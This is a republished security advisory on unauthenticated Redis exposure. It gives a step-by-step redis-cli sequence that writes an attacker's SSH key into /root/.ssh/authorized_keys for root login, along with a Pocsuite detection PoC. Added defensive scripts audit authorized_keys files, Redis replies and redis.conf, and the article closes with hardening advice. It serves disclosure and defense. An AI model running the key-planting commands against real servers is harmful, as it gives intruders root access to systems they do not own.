2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
Preface
Redis is an open-source, network-capable key-value store written in ANSI C. It can run purely in memory or persist data to disk, and it offers client APIs in many languages.
Unauthorized access to Redis has been a long-standing problem; the Chuangyu security research team has handled related incidents in the past. Now there is another case in which unauthorized Redis access is combined with writing SSH key files, and a large number of Redis servers have been compromised as a result. This article gives a brief analysis.
I. Vulnerability overview
By default, Redis binds to 0.0.0.0:6379, which exposes the Redis service to the public network. If authentication is not enabled, any user who can reach the target server can access Redis and read its data without authorization. With unauthenticated access, an attacker can use Redis's own commands to write a public key onto the Redis server and then log in to the target server directly with the corresponding private key.
1. Vulnerability description
The Redis security model is summed up by its own documentation: "Please do not expose Redis to the public network, because it is very dangerous to expose Redis to untrusted clients."
The reason the Redis author declined to solve the insecurity caused by unauthorized access is that 99.99% of Redis deployments run in a sandboxed environment, and adding security rules and complexity for the remaining 0.01% is, in his design philosophy, not cost-effective, even though the problem is not insurmountable.
Because other trusted users need to use Redis, or through negligence of the operations staff, some Redis instances are bound to 0.0.0.0:6379 with authentication disabled (this is the default Redis configuration). If no compensating policy is applied, such as firewall rules that block IP addresses from untrusted sources, the Redis service is exposed directly on the public network, and other users can access it and perform operations without any authorization.
Using the CONFIG command that Redis itself provides, files can be written to disk: the attacker can write his public key into the authorized_keys file in the /root/.ssh directory of the target server and then log in to the target server directly with the corresponding private key.
2. Impact of vulnerabilities
Redis exposed on the public network (that is, bound to 0.0.0.0:6379 on a target IP reachable from the Internet) can be exploited when it is not authenticated and no compensating security policy has been applied.
ZoomEye search results show that 97707 Redis services can be accessed directly on the public network.
According to ZoomEye probing, the global distribution of unauthenticated, directly exploitable Redis instances is as follows:
Top 10 countries and territories by number of unauthenticated, directly exploitable Redis instances:
3. Vulnerability analysis and exploitation
First, produce the public and private key files locally:
$ ssh-keygen -t rsa
Then write the public key to the foo.txt file
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
Reconnect the Redis to write to the file
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
OK
$ redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dir /root/.ssh/
OK
192.168.1.11:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
192.168.1.11:6379> save
OK
In this way the public key is written into the authorized_keys file in the /root/.ssh directory, and the attacker then simply runs:
$ ssh -i id_rsa root@192.168.1.11
You can log in to the server remotely using your private key.
Of course, the target is not limited to authorized_keys under /root/.ssh; the attacker can also write into an ordinary user's home directory. Since many Redis instances run as root, however, writing into the root directory skips the step of guessing user names.
4. Other hazards of unauthorized Redis access
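An incident-response check for the artifact this technique leaves behind, added here as an example and not part of the original article. When Redis is made to SAVE into authorized_keys, the file becomes a Redis RDB dump: it starts with the "REDIS" magic, carries binary framing, and the planted key line sits inside it surrounded by the newlines that were padded into foo.txt. sshd ignores lines it cannot parse and honours the valid key line, so the file keeps working for the attacker while looking corrupt to a person. The scanner below flags such files; the two file contents are constructed samples, not captured data.

```python
import re

# Every RDB dump starts with this magic followed by a version number.
RDB_MAGIC = b"REDIS"

# Key types sshd accepts. Lines prefixed with authorized_keys options
# (command="...", from="...") are not modelled here and count as junk;
# extend the pattern if your environment uses them.
KEY_LINE = re.compile(
    rb"^(ssh-(rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+[A-Za-z0-9+/=]+(\s.*)?$"
)


def audit_authorized_keys(data: bytes) -> dict:
    """Return findings for the raw bytes of an authorized_keys file."""
    findings = {
        "rdb_magic": data.startswith(RDB_MAGIC),
        # Anything outside printable ASCII / common whitespace is binary junk.
        "binary_bytes": any(
            b < 0x09 or (0x0D < b < 0x20) or b > 0x7E for b in data
        ),
        "valid_keys": [],
        "junk_lines": 0,
    }
    for line in data.split(b"\n"):
        line = line.strip()
        if not line or line.startswith(b"#"):
            continue
        if KEY_LINE.match(line):
            # A key sshd would accept, even inside an otherwise garbled file.
            findings["valid_keys"].append(line.decode())
        else:
            findings["junk_lines"] += 1
    findings["suspicious"] = findings["rdb_magic"] or findings["binary_bytes"]
    return findings


# Constructed sample: what the file looks like after the CONFIG SET dir /
# dbfilename / SAVE sequence. The framing bytes are illustrative, not a
# byte-exact RDB.
RDB_SAMPLE = (
    b"REDIS0006\xfe\x00\x00\x07crackit\x40"
    b"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7 attacker@example\n\n"
    b"\xff\x12\x34\x56\x78\x9a\xbc\xde\xf0"
)

# Constructed sample of a normal file.
CLEAN_SAMPLE = b"# admin key\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGx admin@host\n"

if __name__ == "__main__":
    for name, sample in (("rdb", RDB_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(name, audit_authorized_keys(sample))
```

Run it against the real file with `audit_authorized_keys(open("/root/.ssh/authorized_keys", "rb").read())`; a `suspicious` result with a `valid_keys` entry you do not recognise is exactly the trace this write-up describes, and the offending key line is the indicator to preserve before cleaning up.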
A) Database data leakage
Redis, as a database, stores all kinds of data. Unauthorized access therefore leads directly to data leakage, including stored user information.
B) Code execution
Redis can run embedded Lua scripts, and this feature can lead to code execution, with the same consequences as code execution on any other server. An example follows: once an attacker can execute arbitrary code on the server side, the attack can be escalated in increasingly complex ways, which is very dangerous.
Through Lua code, attackers can also call the redis.sha1hex() function to abuse the Redis server as a SHA-1 cracking engine.
C) Disclosure of sensitive information
Through the Redis INFO command, an attacker can read server parameters and other sensitive information, laying the groundwork for further penetration.
As the output shows, a great deal of server information is leaked, such as the running Redis version, memory usage, the number of connected clients and other sensitive details.
5. Vulnerability verification
You can use Pocsuite (http://github.com/knownsec/pocsuite) to run the following PoC, which tests whether an unauthenticated Redis service is exposed at the target address.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Pocsuite PoC (Python 2): sends an INFO command over a raw socket and
# treats a reply containing "redis_version" as proof of unauthenticated access.
import socket
import urlparse

from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '89339'
    version = '1'
    author = ['Anonymous']
    vulDate = '2015-10-26'
    createDate = '2015-10-26'
    updateDate = '2015-10-26'
    references = ['http://sebug.net/vuldb/ssvid-89339']
    name = 'Redis unauthorized access PoC'
    appPowerLink = 'http://redis.io/'
    appName = 'Redis'
    appVersion = 'All'
    vulType = 'Unauthorized access'
    desc = '''Redis can be accessed without a password by default. Hackers can access all the information in the database directly, resulting in serious information leakage.'''
    samples = ['']

    def _verify(self):
        result = {}
        # RESP encoding of the INFO command: "*1\r\n$4\r\ninfo\r\n"
        payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
        s = socket.socket()
        # settimeout() applies to this socket; setdefaulttimeout() would only
        # affect sockets created afterwards.
        s.settimeout(10)
        try:
            host = urlparse.urlparse(self.url).netloc
            port = 6379
            s.connect((host, port))
            s.send(payload)
            recvdata = s.recv(1024)
            if recvdata and 'redis_version' in recvdata:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Port'] = port
        except Exception:
            pass
        s.close()
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)
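The PoC's opaque payload is simply the RESP (Redis serialization protocol) encoding of the INFO command, and the reply it inspects is a RESP bulk string. The Python 3 helper below is an added example, not the article's PoC or any Pocsuite API: it builds such a frame from a command list, shows that the result is byte-for-byte the PoC's payload, and classifies a first reply as open (INFO served without a password), protected (a -NOAUTH error, meaning requirepass is set) or not Redis at all. The two replies are constructed samples; nothing here touches the network.

```python
def encode_resp(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings, as redis-cli does."""
    frame = b"*%d\r\n" % len(args)
    for a in args:
        raw = a.encode()
        frame += b"$%d\r\n%s\r\n" % (len(raw), raw)
    return frame


def classify_reply(reply: bytes) -> str:
    """Interpret the first reply to an unauthenticated INFO."""
    if reply.startswith(b"-NOAUTH"):
        return "protected"  # requirepass is configured; auth needed first
    if reply.startswith(b"$") and b"redis_version:" in reply:
        return "open"       # bulk string carrying server INFO: no auth required
    return "not-redis"      # anything else (HTTP banner, garbage, closed)


def parse_info(reply: bytes) -> dict:
    """Turn an INFO bulk-string reply into a key/value dict; section headers skipped."""
    body = reply.split(b"\r\n", 1)[1] if reply.startswith(b"$") else reply
    info = {}
    for line in body.decode(errors="replace").splitlines():
        if ":" in line and not line.startswith("#"):
            key, value = line.split(":", 1)
            info[key] = value
    return info


# Constructed sample replies (the bulk-string length prefix counts the 73 body bytes).
OPEN_REPLY = (
    b"$73\r\n"
    b"# Server\r\nredis_version:3.0.5\r\nos:Linux\r\n"
    b"# Clients\r\nconnected_clients:1\r\n\r\n"
)
NOAUTH_REPLY = b"-NOAUTH Authentication required.\r\n"

if __name__ == "__main__":
    print(encode_resp("info"))
    for reply in (OPEN_REPLY, NOAUTH_REPLY, b"HTTP/1.1 400 Bad Request\r\n"):
        print(classify_reply(reply))
    print(parse_info(OPEN_REPLY))
```

Distinguishing "protected" from "not-redis" is what a defender wants from an inventory scan: a -NOAUTH reply means the instance is reachable but the password recommendation below has been applied, while an "open" reply is the condition this whole write-up is about.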
II. Security recommendations
Configure the bind option to restrict which IP addresses may connect to the Redis server, and change the default port 6379.
Configure authentication (AUTH) by setting a password; note that it is stored in clear text in the Redis configuration file.
Configure the rename-command option, for example renaming CONFIG to "RENAME_CONFIG", so that even if unauthorized access occurs, it is harder for an attacker to use the CONFIG command.
The good news is that the Redis author has said a "real user" feature will be developed to distinguish ordinary users from administrators, and ordinary users will be prohibited from running certain commands, such as CONFIG.
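The three recommendations above can be checked offline against a redis.conf file. The following is an added example, not code from the article or from the Redis project: it parses the configuration directives, then flags an unrestricted bind, the default port, a missing requirepass, and a CONFIG command still reachable under its default name. Both configuration texts are constructed samples; the hardened one shows the corrected settings beside the weak defaults.

```python
import shlex

# Constructed sample: the default-style configuration this article warns about.
WEAK_CONF = """\
# listens on all interfaces because bind is commented out; no password
port 6379
# bind 127.0.0.1
daemonize yes
dir /var/lib/redis
"""

# Constructed sample with the recommendations applied. The password is stored
# in clear text here, exactly as the article notes, so protect the file itself.
HARDENED_CONF = """\
port 16379
bind 127.0.0.1 10.0.0.5
requirepass CHANGE-ME-long-random-secret
rename-command CONFIG "RENAME_CONFIG"
dir /var/lib/redis
"""


def parse_redis_conf(text: str) -> dict:
    """Map directive -> list of argument lists. Comments and blank lines are
    ignored; repeated directives (e.g. several rename-command lines) are kept."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles the quoted "" used to disable a command
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text: str) -> list:
    """Return a list of findings; an empty list means all three checks pass."""
    conf = parse_redis_conf(text)
    findings = []

    binds = conf.get("bind", [[]])[-1]  # last bind directive wins
    if not binds or "0.0.0.0" in binds or "*" in binds:
        findings.append("bind: listens on all interfaces (no bind, 0.0.0.0 or *)")

    port = conf.get("port", [["6379"]])[-1][0]
    if port == "6379":
        findings.append("port: default 6379 in use")

    password = conf.get("requirepass", [[""]])[-1]
    if not password or not password[0]:
        findings.append("requirepass: no password configured (unauthenticated access)")

    # rename-command CONFIG "" disables it; any other new name hides it.
    renamed = {
        args[0].upper(): args[1]
        for args in conf.get("rename-command", [])
        if len(args) == 2
    }
    if renamed.get("CONFIG", "CONFIG").upper() == "CONFIG":
        findings.append("rename-command: CONFIG still reachable under its default name")

    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(text) or "ok")
```

Point `audit_redis_conf` at `open("/etc/redis/redis.conf").read()` to check a live host; a non-empty list maps one-to-one onto the recommendations that still need applying.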
Summary
That is the whole content of this article. I hope it has some reference and learning value for your study or work; if you have any questions, please leave a message, and thank you for your support.